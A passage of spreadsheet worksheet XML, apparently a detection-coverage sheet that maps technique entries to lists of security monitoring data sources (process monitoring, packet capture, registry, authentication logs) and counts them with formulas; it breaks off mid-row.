    <row r="73" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A73" s="16" t="s">
        <v>120</v>
      </c>
      <c r="B73" s="13" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C73" s="17" t="s">
        <v>121</v>
      </c>
      <c r="D73" s="13">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E73" s="13">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F73" s="13"/>
      <c r="G73" s="19"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A74" s="16" t="s">
        <v>122</v>
      </c>
      <c r="B74" s="13" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C74" s="17" t="s">
        <v>100</v>
      </c>
      <c r="D74" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E74" s="13">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F74" s="13"/>
      <c r="G74" s="19"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A75" s="16" t="s">
        <v>123</v>
      </c>
      <c r="B75" s="13" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C75" s="17" t="s">
        <v>24</v>
      </c>
      <c r="D75" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E75" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F75" s="13"/>
      <c r="G75" s="19"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A76" s="16" t="s">
        <v>124</v>
      </c>
      <c r="B76" s="13" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C76" s="17">
        <v>100</v>
      </c>
      <c r="D76" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E76" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="13"/>
      <c r="G76" s="19"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A77" s="16" t="s">
        <v>125</v>
      </c>
      <c r="B77" s="13" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C77" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D77" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E77" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F77" s="13"/>
      <c r="G77" s="19"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A78" s="16" t="s">
        <v>126</v>
      </c>
      <c r="B78" s="13" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C78" s="17" t="s">
        <v>127</v>
      </c>
      <c r="D78" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E78" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F78" s="13"/>
      <c r="G78" s="19"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A79" s="16" t="s">
        <v>128</v>
      </c>
      <c r="B79" s="13" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Process monitoring</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>129</v>
      </c>
      <c r="D79" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E79" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F79" s="13"/>
      <c r="G79" s="19"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A80" s="16" t="s">
        <v>130</v>
      </c>
      <c r="B80" s="13" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C80" s="17" t="s">
        <v>131</v>
      </c>
      <c r="D80" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E80" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F80" s="13"/>
      <c r="G80" s="19"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A81" s="16" t="s">
        <v>132</v>
      </c>
      <c r="B81" s="13" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C81" s="17" t="s">
        <v>129</v>
      </c>
      <c r="D81" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E81" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F81" s="13"/>
      <c r="G81" s="19"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A82" s="16" t="s">
        <v>133</v>
      </c>
      <c r="B82" s="13" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C82" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D82" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E82" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F82" s="13"/>
      <c r="G82" s="19"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A83" s="16" t="s">
        <v>134</v>
      </c>
      <c r="B83" s="13" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C83" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D83" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E83" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F83" s="13"/>
      <c r="G83" s="19"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A84" s="16" t="s">
        <v>135</v>
      </c>
      <c r="B84" s="13" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C84" s="17" t="s">
        <v>24</v>
      </c>
      <c r="D84" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E84" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F84" s="13"/>
      <c r="G84" s="19"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A85" s="16" t="s">
        <v>136</v>
      </c>
      <c r="B85" s="13" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>WMI Objects</v>
      </c>
      <c r="C85" s="17">
        <v>100</v>
      </c>
      <c r="D85" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E85" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="13"/>
      <c r="G85" s="19"/>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A86" s="16" t="s">
        <v>137</v>
      </c>
      <c r="B86" s="13" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C86" s="17" t="s">
        <v>138</v>
      </c>
      <c r="D86" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E86" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F86" s="13"/>
      <c r="G86" s="19"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A87" s="16" t="s">
        <v>139</v>
      </c>
      <c r="B87" s="13" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C87" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D87" s="13">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E87" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F87" s="13"/>
      <c r="G87" s="19"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A88" s="16" t="s">
        <v>141</v>
      </c>
      <c r="B88" s="13" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C88" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D88" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E88" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F88" s="13"/>
      <c r="G88" s="19"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A89" s="16" t="s">
        <v>142</v>
      </c>
      <c r="B89" s="13" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Authentication logs,Process command-line parameters</v>
      </c>
      <c r="C89" s="17" t="s">
        <v>143</v>
      </c>
      <c r="D89" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E89" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F89" s="13"/>
      <c r="G89" s="19"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A90" s="16" t="s">
        <v>144</v>
      </c>
      <c r="B90" s="13" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</v>
      </c>
      <c r="C90" s="17" t="s">
        <v>145</v>
      </c>
      <c r="D90" s="13">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E90" s="13">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F90" s="13"/>
      <c r="G90" s="19"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A91" s="16" t="s">
        <v>146</v>
      </c>
      <c r="B91" s="13" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C91" s="17" t="s">
        <v>147</v>
      </c>
      <c r="D91" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E91" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F91" s="13"/>
      <c r="G91" s="19"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A92" s="16" t="s">
        <v>148</v>
      </c>
      <c r="B92" s="13" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C92" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D92" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F92" s="13"/>
      <c r="G92" s="19"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A93" s="16" t="s">
        <v>149</v>
      </c>
      <c r="B93" s="13" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C93" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D93" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E93" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F93" s="13"/>
      <c r="G93" s="19"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A94" s="16" t="s">
        <v>150</v>
      </c>
      <c r="B94" s="13" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C94" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D94" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E94" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F94" s="13"/>
      <c r="G94" s="19"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A95" s="16" t="s">
        <v>151</v>
      </c>
      <c r="B95" s="13" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</v>
      </c>
      <c r="C95" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D95" s="13">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E95" s="13">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F95" s="13"/>
      <c r="G95" s="19"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A96" s="16" t="s">
        <v>153</v>
      </c>
      <c r="B96" s="13" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C96" s="17" t="s">
        <v>154</v>
      </c>
      <c r="D96" s="13">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E96" s="13">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F96" s="13"/>
      <c r="G96" s="19"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A97" s="16" t="s">
        <v>155</v>
      </c>
      <c r="B97" s="13" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</v>
      </c>
      <c r="C97" s="17" t="s">
        <v>156</v>
      </c>
      <c r="D97" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E97" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F97" s="13"/>
      <c r="G97" s="19"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A98" s="16" t="s">
        <v>157</v>
      </c>
      <c r="B98" s="13" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C98" s="17">
        <v>100</v>
      </c>
      <c r="D98" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E98" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="13"/>
      <c r="G98" s="19"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A99" s="16" t="s">
        <v>158</v>
      </c>
      <c r="B99" s="13" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,API monitoring,Windows event logs,Packet capture</v>
      </c>
      <c r="C99" s="17" t="s">
        <v>77</v>
      </c>
      <c r="D99" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E99" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F99" s="13"/>
      <c r="G99" s="19"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A100" s="16" t="s">
        <v>159</v>
      </c>
      <c r="B100" s="13" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C100" s="17" t="s">
        <v>160</v>
      </c>
      <c r="D100" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E100" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F100" s="13"/>
      <c r="G100" s="19"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A101" s="16" t="s">
        <v>161</v>
      </c>
      <c r="B101" s="13" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C101" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D101" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E101" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F101" s="13"/>
      <c r="G101" s="19"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A102" s="16" t="s">
        <v>162</v>
      </c>
      <c r="B102" s="13" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="C102" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D102" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F102" s="13"/>
      <c r="G102" s="19"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A103" s="16" t="s">
        <v>163</v>
      </c>
      <c r="B103" s="13" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C103" s="17" t="s">
        <v>164</v>
      </c>
      <c r="D103" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E103" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F103" s="13"/>
      <c r="G103" s="19"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A104" s="16" t="s">
        <v>165</v>
      </c>
      <c r="B104" s="13" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry</v>
      </c>
      <c r="C104" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D104" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E104" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F104" s="13"/>
      <c r="G104" s="19"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A105" s="16" t="s">
        <v>166</v>
      </c>
      <c r="B105" s="13" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C105" s="17" t="s">
        <v>167</v>
      </c>
      <c r="D105" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E105" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F105" s="13"/>
      <c r="G105" s="19"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A106" s="16" t="s">
        <v>168</v>
      </c>
      <c r="B106" s="13" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C106" s="17" t="s">
        <v>169</v>
      </c>
      <c r="D106" s="13">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E106" s="13">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F106" s="13"/>
      <c r="G106" s="19"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A107" s="16" t="s">
        <v>170</v>
      </c>
      <c r="B107" s="13" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C107" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D107" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E107" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F107" s="13"/>
      <c r="G107" s="19"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A108" s="16" t="s">
        <v>171</v>
      </c>
      <c r="B108" s="13" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C108" s="17" t="s">
        <v>172</v>
      </c>
      <c r="D108" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E108" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F108" s="13"/>
      <c r="G108" s="19"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A109" s="16" t="s">
        <v>173</v>
      </c>
      <c r="B109" s="13" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C109" s="17" t="s">
        <v>174</v>
      </c>
      <c r="D109" s="13">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E109" s="13">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F109" s="13"/>
      <c r="G109" s="19"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A110" s="16" t="s">
        <v>175</v>
      </c>
      <c r="B110" s="13" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Disk forensics,API monitoring,Process monitoring,Component firmware</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>176</v>
      </c>
      <c r="D110" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E110" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F110" s="13"/>
      <c r="G110" s="19"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A111" s="16" t="s">
        <v>177</v>
      </c>
      <c r="B111" s="13" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C111" s="17">
        <v>100</v>
      </c>
      <c r="D111" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E111" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="13"/>
      <c r="G111" s="19"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A112" s="16" t="s">
        <v>178</v>
      </c>
      <c r="B112" s="13" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C112" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D112" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E112" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F112" s="13"/>
      <c r="G112" s="19"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A113" s="16" t="s">
        <v>179</v>
      </c>
      <c r="B113" s="13" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C113" s="17" t="s">
        <v>180</v>
      </c>
      <c r="D113" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E113" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F113" s="13"/>
      <c r="G113" s="19"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A114" s="16" t="s">
        <v>181</v>
      </c>
      <c r="B114" s="13" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C114" s="17" t="s">
        <v>182</v>
      </c>
      <c r="D114" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F114" s="13"/>
      <c r="G114" s="19"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A115" s="16" t="s">
        <v>183</v>
      </c>
      <c r="B115" s="13" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C115" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D115" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E115" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F115" s="13"/>
      <c r="G115" s="19"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A116" s="16" t="s">
        <v>185</v>
      </c>
      <c r="B116" s="13" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C116" s="17">
        <v>100</v>
      </c>
      <c r="D116" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="13"/>
      <c r="G116" s="19"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A117" s="16" t="s">
        <v>186</v>
      </c>
      <c r="B117" s="13" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C117" s="17">
        <v>100</v>
      </c>
      <c r="D117" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="13"/>
      <c r="G117" s="19"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A118" s="16" t="s">
        <v>187</v>
      </c>
      <c r="B118" s="13" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</v>
      </c>
      <c r="C118" s="17" t="s">
        <v>39</v>
      </c>
      <c r="D118" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E118" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F118" s="13"/>
      <c r="G118" s="19"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A119" s="16" t="s">
        <v>188</v>
      </c>
      <c r="B119" s="13" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C119" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D119" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E119" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F119" s="13"/>
      <c r="G119" s="19"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A120" s="16" t="s">
        <v>189</v>
      </c>
      <c r="B120" s="13" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C120" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D120" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F120" s="13"/>
      <c r="G120" s="19"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A121" s="16" t="s">
        <v>190</v>
      </c>
      <c r="B121" s="13" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C121" s="17">
        <v>0</v>
      </c>
      <c r="D121" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E121" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="13"/>
      <c r="G121" s="19"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A122" s="16" t="s">
        <v>191</v>
      </c>
      <c r="B122" s="13" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C122" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D122" s="13">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E122" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F122" s="13"/>
      <c r="G122" s="19"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A123" s="16" t="s">
        <v>192</v>
      </c>
      <c r="B123" s="13" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
